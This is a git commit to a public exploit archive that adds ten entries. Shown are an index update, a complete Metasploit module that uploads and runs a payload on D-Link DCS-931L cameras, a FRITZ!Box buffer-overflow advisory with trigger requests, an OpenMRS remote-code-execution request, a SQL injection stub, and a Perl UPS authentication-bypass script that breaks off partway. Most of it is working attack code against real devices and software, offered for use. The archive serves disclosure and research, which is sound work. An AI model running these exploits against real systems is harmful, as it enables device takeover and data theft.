DB: 2016-01-08

10 new exploits
2016-01-08 05:03:43 +00:00 · 2016-01-08 05:03:43 +00:00 · 97940c47e2
commit 97940c47e2
parent 53d9096a7c
11 changed files with 721 additions and 5 deletions
--- a/files.csv
+++ b/files.csv
@ -9381,7 +9381,7 @@ id,file,description,date,author,platform,type,port
 10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445
 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0
 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0
-10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
+10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0
 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0
 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0
@ -12598,7 +12598,7 @@ id,file,description,date,author,platform,type,port
 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0
 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0
-14339,platforms/linux/local/14339.sh,"Ubuntu PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0
+14339,platforms/linux/local/14339.sh,"Ubuntu 9.10 (Karmic Koala) & 10.04 LTS (Lucid Lynx) PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0
 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0
 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0
@ -13266,7 +13266,7 @@ id,file,description,date,author,platform,type,port
 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0
 15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
 15607,platforms/php/webapps/15607.txt,"WSN Links - SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0
-15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0
+15237,platforms/php/webapps/15237.rb,"AdaptCMS 2.0.1 Beta Release - Remote File Inclusion Vulnerability (Metasploit)",2010-10-12,v3n0m,php,webapps,0
 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0
 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0
 15240,platforms/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0
@ -30291,8 +30291,8 @@ id,file,description,date,author,platform,type,port
 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0
 33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0
 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting Vulnerability",2010-02-04,s4r4d0,php,webapps,0
-33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability",2010-02-04,kingcope,linux,remote,0
-33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability (2)",2010-02-04,kingcope,linux,remote,0
+33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 - Symlink Directory Traversal Vulnerability (Metasploit)",2010-02-04,kingcope,linux,remote,0
+33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 - Symlink Directory Traversal Vulnerability (C)",2010-02-04,kingcope,linux,remote,0
 33600,platforms/multiple/remote/33600.rb,"Oracle 10g - Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
 33601,platforms/multiple/remote/33601.rb,"Oracle 11g - Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
 33602,platforms/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps,0
@ -35432,3 +35432,12 @@ id,file,description,date,author,platform,type,port
 39183,platforms/windows/dos/39183.py,"ALLPlayer '.wav' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
 39185,platforms/lin_x86-64/shellcode/39185.c,"TCP Reverse Shell with Password Prompt - 151 bytes",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
+39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 Authentication Bypass Vulnerability",2014-05-15,jkmac,multiple,remote,0
+39187,platforms/asp/webapps/39187.txt,"CIS Manager 'email' Parameter SQL Injection Vulnerability",2014-05-16,Edge,asp,webapps,0
+39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS '/modules/glossaire/glossaire-aff.php' SQL Injection Vulnerability",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX Multiple SQL Injection Vulnerabilities",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39190,platforms/php/webapps/39190.php,"WordPress cnhk-slideshow Plugin Arbitrary File Upload Vulnerability",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0
+39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager 'backend/php/src/setup/rpc.php' Remote Code Execution Vulnerability",2014-05-20,"Manish Tanwar",php,webapps,0
+39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L File Upload",2016-01-07,metasploit,hardware,webapps,0
+39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0
+39194,platforms/hardware/webapps/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,webapps,0
--- a/platforms/asp/webapps/39187.txt
+++ b/platforms/asp/webapps/39187.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/67442/info
+
+CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection] 
--- a/platforms/hardware/webapps/39192.rb
+++ b/platforms/hardware/webapps/39192.rb
@ -0,0 +1,210 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  HttpFingerprint = { :pattern => [ /alphapd/ ] }
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'D-Link DCS-931L File Upload',
+      'Description' => %q{
+          This module exploits a file upload vulnerability in D-Link DCS-931L
+        network cameras. The setFileUpload functionality allows authenticated
+        users to upload files to anywhere on the file system, allowing system
+        files to be overwritten, resulting in execution of arbitrary commands.
+        This module has been tested successfully on a D-Link DCS-931L with
+        firmware versions 1.01_B7 (2013-04-19) and 1.04_B1 (2014-04-21).
+        D-Link DCS-930L, DCS-932L, DCS-933L models are also reportedly
+        affected, but untested.
+      },
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Mike Baucom', 'Allen Harper', 'J. Rach', # Initial discovery by Tangible Security
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'Payload' =>
+        {
+          'Space' => 1024, # File upload
+          'DisableNops' => true
+        },
+      'Platform' => 'linux',
+      'Privileged' => false,
+      'Targets' =>
+        [
+          [ 'Linux mipsle Payload',
+            {
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'References' =>
+        [
+          [ 'CVE', '2015-2049' ],
+          [ 'URL', 'https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities' ],
+          [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10049' ] # Vendor advisory
+        ],
+      'DisclosureDate' => 'Feb 23 2015'))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'Camera username', 'admin']),
+        OptString.new('PASSWORD',  [false, 'Camera password (default: blank)', ''])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri('uploadfile.htm'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']
+    ))
+
+    unless res
+      vprint_status("#{peer} - The connection timed out.")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.code && res.code == 404
+      vprint_status("#{peer} - uploadfile.htm does not exist")
+      return Exploit::CheckCode::Safe
+    elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/
+      vprint_error("#{peer} - Authentication failed")
+      return Exploit::CheckCode::Detected
+    elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/
+      return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    payload_path = "/tmp/.#{rand_text_alphanumeric(rand(8) + 5)}"
+
+    # upload payload
+    res = upload(payload_path, generate_payload_exe)
+
+    unless res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+    if res.code && res.code == 404
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
+    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
+      print_good("#{peer} - Payload uploaded successfully")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
+    end
+    register_file_for_cleanup(payload_path)
+
+    # overwrite /sbin/chpasswd.sh with stub
+    res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n")
+
+    unless res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+    if res.code && res.code == 404
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
+    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
+      print_good("#{peer} - Stager uploaded successfully")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
+    end
+
+    # execute payload using stub
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri('setSystemAdmin'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'vars_post' => Hash[{
+        'ReplySuccessPage' => 'advanced.htm',
+        'ReplyErrorPage' => 'errradv.htm',
+        'ConfigSystemAdmin' => 'Apply'
+      }.to_a.shuffle])
+
+    unless res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    end
+
+    if res.code && res.code == 401
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+    elsif res.code && res.code == 200 && res.body
+      print_good("#{peer} - Payload executed successfully")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed")
+    end
+  end
+
+  #
+  # Replace chpasswd.sh with original contents
+  #
+  def cleanup
+    chpasswd = <<-EOF
+#!/bin/sh
+#
+# $Id: chpasswd.sh, v1.00 2009-11-05 andy
+#
+# usage: chpasswd.sh <user name> [<password>]
+#
+
+if [ "$1" == "" ]; then
+    echo "chpasswd: no user name"
+    exit 1
+fi
+
+echo "$1:$2" > /tmp/tmpchpw
+chpasswd < /tmp/tmpchpw
+rm -f /tmp/tmpchpw
+EOF
+    res = upload('/sbin/chpasswd.sh', chpasswd)
+    if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
+      vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully")
+    else
+      vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default")
+    end
+  end
+
+  #
+  # Upload a file to a specified path
+  #
+  def upload(path, data)
+    vprint_status("#{peer} - Writing #{data.length} bytes to #{path}")
+
+    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
+    post_data  = "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"ReplySuccessPage\"\r\n"
+    post_data << "\r\nreplyuf.htm\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"ReplyErrorPage\"\r\n"
+    post_data << "\r\nreplyuf.htm\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n"
+    post_data << "\r\n#{path}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"UploadFile\"; filename=\"#{rand_text_alphanumeric(rand(8) + 5)}\"\r\n"
+    post_data << "Content-Type: application/octet-stream\r\n"
+    post_data << "\r\n#{data}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"ConfigUploadFile\"\r\n"
+    post_data << "\r\nUpload File\r\n"
+    post_data << "--#{boundary}\r\n"
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri('setFileUpload'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => post_data)
+  end
+end
--- a/platforms/hardware/webapps/39194.txt
+++ b/platforms/hardware/webapps/39194.txt
@ -0,0 +1,277 @@
+Advisory: AVM FRITZ!Box: Remote Code Execution via Buffer Overflow
+
+RedTeam Pentesting discovered that several models of the AVM FRITZ!Box
+are vulnerable to a stack-based buffer overflow, which allows attackers
+to execute arbitrary code on the device.
+
+
+Details
+=======
+
+Product: AVM FRITZ!Box 3272/7272, 3370/3390/3490, 7312/7412,
+                       7320/7330 (SL), 736x (SL) and 7490
+Affected Versions: versions prior to 6.30 (all models) [0]
+Fixed Versions: >= 6.30 (all models) [0]
+Vulnerability Type: Buffer Overflow
+Security Risk: high
+Vendor URL: http://avm.de/
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-001
+Advisory Status: published
+CVE: GENERIC-MAP-NOMATCH
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
+
+
+Introduction
+============
+
+FRITZ!Box is the brand name of SOHO routers/CPEs manufactured by AVM
+GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a
+wifi access point, routing, VoIP, NAS and DECT.
+
+
+More Details
+============
+
+When examining the running processes on a FRITZ!Box, it was discovered
+that the program dsl_control listens on TCP port 8080:
+
+# netstat -anp | grep dsl_control
+tcp   0   0 0.0.0.0:8080   0.0.0.0:*   LISTEN   849/dsl_control
+
+By sending an HTTP request to the service, it can be seen in the
+server's response that the daemon expects SOAP messages (output
+shortened):
+
+$ curl --silent http://fritz.box:8080/ | xmllint -format -
+<?xml version="1.0" encoding="UTF-8"?>
+<SOAP-ENV:Envelope [...]>
+  <SOAP-ENV:Body>
+    <SOAP-ENV:Fault SOAP-ENV:encodingStyle="[...]">
+      <faultcode>SOAP-ENV:Client</faultcode>
+      <faultstring>HTTP GET method not implemented</faultstring>
+    </SOAP-ENV:Fault>
+  </SOAP-ENV:Body>
+</SOAP-ENV:Envelope>
+
+After examining the dsl_control binary by using GNU strings and
+performing a web search for some of the resulting values, it was quickly
+discovered that parts of the daemon's source code can be found in the
+Git repository of the dd-wrt firmware[1].
+
+In order to retrieve the list of all commands that are implemented by
+the daemon, the following SOAP message can be sent to the server,
+specifying an ifx:DslCpeCliAccess element containing an empty command
+element (output shortened):
+
+$ curl --silent http://fritz.box:8080/ --data '
+<?xml version="1.0" encoding="UTF-8"?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/[...]"
+ xmlns:ifx="urn:dsl_api">
+  <SOAP-ENV:Body>
+      <ifx:DslCpeCliAccess>
+          <command></command>
+      </ifx:DslCpeCliAccess>
+  </SOAP-ENV:Body>
+</SOAP-ENV:Envelope>' | xmllint -format -
+<?xml version="1.0" encoding="UTF-8"?>
+[...]
+    <ifx:DslCpeCliAccessResponse>
+      <result>avmcr, avmcrmr, avmcrms, avmcw, avmdsmmcs, avmhwrfit,
+avmpet, avmvig, acog, acos, acs, alf, asecg, asecs, asg, aufg, alig,
+bbsg, bpstg, bpsg, ccadbgmlg, ccadbgmls, dbgmlg, dbgmls, dsmcg, dsmcs,
+dsmmcg, dsmmcs, dsmstatg, dsmsg, dsnrg, dmms, dms, esmcg, esmcs, fddg,
+fdsg, fpsg, g997amdpfcg, g997amdpfcs, g997amlfcg, g997amlfcs, g997bang,
+g997bansg, g997cdrtcg, g997cdrtcs, g997csg, g997dpfsg, g997dfr,
+g997dhling, g997dhlinsg, g997dhlogg, g997dqlng, g997dsnrg, g997fpsg,
+g997gang, g997gansg, g997lstg, g997lacg, g997lacs, g997lfsg, g997lisg,
+g997lig, g997listrg, g997lis, g997lsg, g997lspbg, g997ltsg, g997lpmcg,
+g997lpmcs, g997pmsft, g997pmsg, g997racg, g997racs, g997sang, g997sansg,
+g997upbosg, g997xtusecg, g997xtusecs, g997xtusesg, help, hsdg, ics, isg,
+lecg, lfcg, lfcs, lfsg, locg, locs, lsg, llsg, llcg, llcs, mlsg, nsecg,
+nsecs, osg, pm15meet, pmbms, pmcc15mg, pmcc1dg, pmccsg, pmcctg,
+pmchs15mg, pmchs1dg, pmct15mg, pmct15ms, pmct1dg, pmct1ds, pmcg, pmcs,
+pmdpc15mg, pmdpc1dg, pmdpcsg, pmdpctg, pmdpfc15mg, pmdpfc1dg, pmdpfcsg,
+pmdpfctg, pmdpfhs15mg, pmdpfhs1dg, pmdphs15mg, pmdphs1dg, pmdpt15mg,
+pmdpt15ms, pmdpt1dg, pmdpt1ds, pmetr, pmlesc15mg, pmlesc1dg, pmlescsg,
+pmlesctg, pmleshs15mg, pmleshs1dg, pmlic15mg, pmlic1dg, pmlicsg,
+pmlictg, pmlihs15mg, pmlihs1dg, pmlit15mg, pmlit15ms, pmlit1dg,
+pmlit1ds, pmlsc15mg, pmlsc1dg, pmlscsg, pmlsctg, pmlshs15mg, pmlshs1dg,
+pmlst15mg, pmlst15ms, pmlst1dg, pmlst1ds, pmrtc15mg, pmrtc1dg, pmrtcsg,
+pmrtctg, pmrths15mg, pmrths1dg, pmrtt15mg, pmrtt15ms, pmrtt1dg,
+pmrtt1ds, pmr, pmsmg, pmsms, ptsg, quit, rtsg, rccg, rccs, rsss, rusg,
+se, sicg, sics, sisg, tcpmistart, tcpmistop, tmcs, tmsg, vig, </result>
+    </ifx:DslCpeCliAccessResponse>
+  </SOAP-ENV:Body>
+</SOAP-ENV:Envelope>
+
+As can be seen in the listing, the server implements several commands.
+Many of them can be accessed without any authentication. One of the
+commands which was further examined is the 'se' or 'ScriptExecute'
+command. It is defined by the file dsl_cpe_cli_access.c, which registers
+the function DSL_CPE_CLI_ScriptExecute as the corresponding handler:
+
+[...]
+   DSL_CPE_CLI_CMD_ADD_COMM (
+      "se",
+      "ScriptExecute",
+      DSL_CPE_CLI_ScriptExecute,
+      g_sSe);
+[...]
+
+The following listing shows dd-wrt's implementation of the command,
+which is also part of the file dsl_cpe_cli_access.c (shortened):
+
+DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute(
+   DSL_int_t fd,
+   DSL_char_t *pCommands,
+   DSL_CPE_File_t *out)
+{
+   DSL_int_t ret = 0;
+   DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};
+
+   if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) ==
+      DSL_FALSE)
+   {
+      return -1;
+   }
+
+   DSL_CPE_sscanf (pCommands, "%s", sFileName);
+
+   [...]
+
+   return 0;
+}
+
+As can be seen in the listing, the function first checks whether
+another parameter is given by calling the function
+DSL_CPE_CLI_CheckParamNumber(). If this is the case, the code proceeds
+to call the function DSL_CPE_sscanf() in order to copy the value of the
+parameter pCommands to the local char array sFileName. Because the
+format string "%s" is provided to the DSL_CPE_sscanf() function, no
+restriction applies to how much data is copied to the array. Therefore,
+an overlong argument passed to the function may possibly exceed the
+array's bounds, leading to a buffer overflow. In order to verify that
+this is the case, the following SOAP message was stored in the file
+trigger.xml, containing 300 capital A characters as the argument for the
+'se' command (output shortened):
+
+<?xml version="1.0" encoding="UTF-8"?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/[...]/"
+ xmlns:ifx="urn:dsl_api">
+  <SOAP-ENV:Body>
+      <ifx:DslCpeCliAccess>
+          <command>se AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</command>
+      </ifx:DslCpeCliAccess>
+  </SOAP-ENV:Body>
+</SOAP-ENV:Envelope>
+
+Afterwards, curl was used to send the SOAP message to the service:
+
+$ curl --data @trigger.xml http://fritz.box:8080/
+curl: (52) Empty reply from server
+
+As indicated by curl's output, no HTTP reply was received. Instead, the
+connection was closed. When accessing the device by using telnet, the
+following crash dump is printed when sending the request, clearly
+showing that the presumed buffer overflow was triggered:
+
+dsl_control[841] crashed at 41414140 [...] accessing 0x41414140
+Version: 06.24
+at: 2ac783d8 v0: 00000000 v1: ffffffff
+a0: 2ac0ac08 a1: 00000001 a2: 00473420 a3: 00000001
+t0: 2aab5280 t1: 8ead1b2c t2: 41414141 t3: 41414141
+t4: 41414141 t5: 00000001 t6: 2ac4d788 t7: 41414141
+s0: 41414141 s1: 41414141 s2: 00000000 s3: 2ad800b0
+s4: 2ad800b0 s5: 00000000 s6: 00080000 s7: 2ab52358
+t8: 00000000 t9: 2ab3dc10
+gp: 00473420 sp: 2ad7fcd0 fp: 2ad7ffe0 ra: 41414141
+
+As seen in the crash dump, several saved registers were overwritten by
+the capital 'A' characters (0x41) provided in the SOAP message. Among
+those registers is the ra register, which stores the return address of
+the current function call, thus allowing an attacker to directly alter
+the control flow. This behaviour can be exploited in order to execute
+arbitrary code. Due to firewall restrictions, the service is only
+accessible from within the internal network connected to the FRITZ!Box.
+However, it is also possible to exploit this vulnerability by utilising
+cross-site request forgery, allowing typical "drive-by" exploitation
+through a user's web browser.
+
+
+Workaround
+==========
+
+None.
+
+
+Fix
+===
+
+Affected users should upgrade to a fixed firmware version as soon as
+possible.
+
+
+Security Risk
+=============
+
+After successful exploitation, attackers gain root privileges on the
+attacked device. This allows attackers to eavesdrop on traffic and to
+initiate and receive arbitrary phone calls, if the device is configured
+for telephony. Furthermore, backdoors may be installed to allow
+persistent access to the device.
+
+In order to exploit the vulnerability, attackers either need to be able
+to connect to the service directly, i.e. from the LAN, or indirectly via
+an attacker-controlled website, that is visited by a FRITZ!Box user.
+This website can exploit the vulnerability via cross-site request
+forgery, connecting to the service via the attacked user's browser.
+Therefore, it is estimated that the vulnerability poses a high risk.
+
+
+Timeline
+========
+
+2015-02-26 Vulnerability identified
+2015-03-26 CVE number requested
+2015-03-26 Vendor notified
+2015-04-30 RedTeam Pentesting reviewed fixed version by order of vendor
+2015-06-09 Vendor released fixed public beta (7490)
+2015-07-16 Vendor started releasing fixed versions (7360 and 7490)
+2015-10-01 Vendor finished releasing fixed versions (other models [0])
+2015-11-27 Advisory release postponed to maximize patch distribution
+2016-01-07 Advisory released
+
+
+References
+==========
+
+[0] https://avm.de/service/sicherheitshinweise/
+[1] https://github.com/mirror/dd-wrt/tree/master/src/router/dsl_cpe_control
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 
+Dennewartstr. 25-27 Fax : +49 241 510081-99 
+52068 Aachen https://www.redteam-pentesting.de 
+Germany Registergericht: Aachen HRB 14004 
+Geschäftsführer: Patrick Hof, Jens Liebchen
+
--- a/platforms/java/webapps/39193.txt
+++ b/platforms/java/webapps/39193.txt
@ -0,0 +1,55 @@
+Title: Unauthenticated remote code execution in OpenMRS
+Product: OpenMRS
+Vendor: OpenMRS Inc.
+Tested versions: See summary
+Status: Fixed by vendor
+Reported by: Brian D. Hysell
+
+Product description:
+
+OpenMRS is "the world's leading open source enterprise electronic
+medical record system platform."
+
+Vulnerability summary:
+
+The OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a
+version of the XStream library vulnerable to CVE-2013-7285, making it
+vulnerable to remote code execution. If the Appointment Scheduling UI
+Module 1.0.3 is also installed, this RCE is accessible to
+unauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform
+1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3
+installed were confirmed to be vulnerable; other versions and
+configurations containing these modules are likely to be vulnerable as
+well (see "Remediation").
+
+Details:
+
+In the Reporting module, the method saveSerializedDefinition (mapped
+to module/reporting/definition/saveSerializedDefinition) in
+InvalidSerializedDefinitionController can be accessed by an
+unauthenticated user.
+
+The attacker must provide a valid UUID for a definition present in
+OpenMRS or a NullPointerException will be thrown before the remote
+code execution can take place. However, upon initialization the
+Appointments Scheduling UI module inserts a definition with a constant
+UUID hard-coded into AppointmentSchedulingUIConstants
+(c1bf0730-e69e-11e3-ac10-0800200c9a66).
+
+Proof of concept:
+
+GET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d"java.beans.EventHandler"><target%20class%3d"java.lang.ProcessBuilder"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject
+
+Remediation:
+
+The vendor has addressed this issue in OpenMRS Standalone 2.3.1,
+OpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,
+1.10.3, and 1.9.10.
+
+Timeline:
+
+Vendor contacted: November 2, 2015
+Vendor replied: November 3
+CVE requested: November 14 (no response)
+Patch released: December 2
+Announced: January 6, 2016
--- a/platforms/multiple/remote/39186.pl
+++ b/platforms/multiple/remote/39186.pl
@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/67438/info
+
+UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.
+
+Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service. 
+
+#!/usr/bin/perl -w
+use IO::Socket;      
+use constant MAXBYTES => scalar 1024;      
+
+$socket = IO::Socket::INET->new( PeerPort  => 4000,
+                                 PeerAddr  => $ARGV[0],
+                                 Type      => SOCK_DGRAM,
+                                 Proto     => 'udp');
+
+$socket->send("<VERSION>");
+$socket->recv($inline, MAXBYTES);
+print "UPS: $inline \n"; 
+
+$socket->send("show syspar");
+$socket->recv($inline, MAXBYTES);
+print "$inline\n";
+
+print "Searching login\n" ; 
+$socket->send("start");
+$socket->recv($inline, MAXBYTES);
+$socket->send("cd /flash");
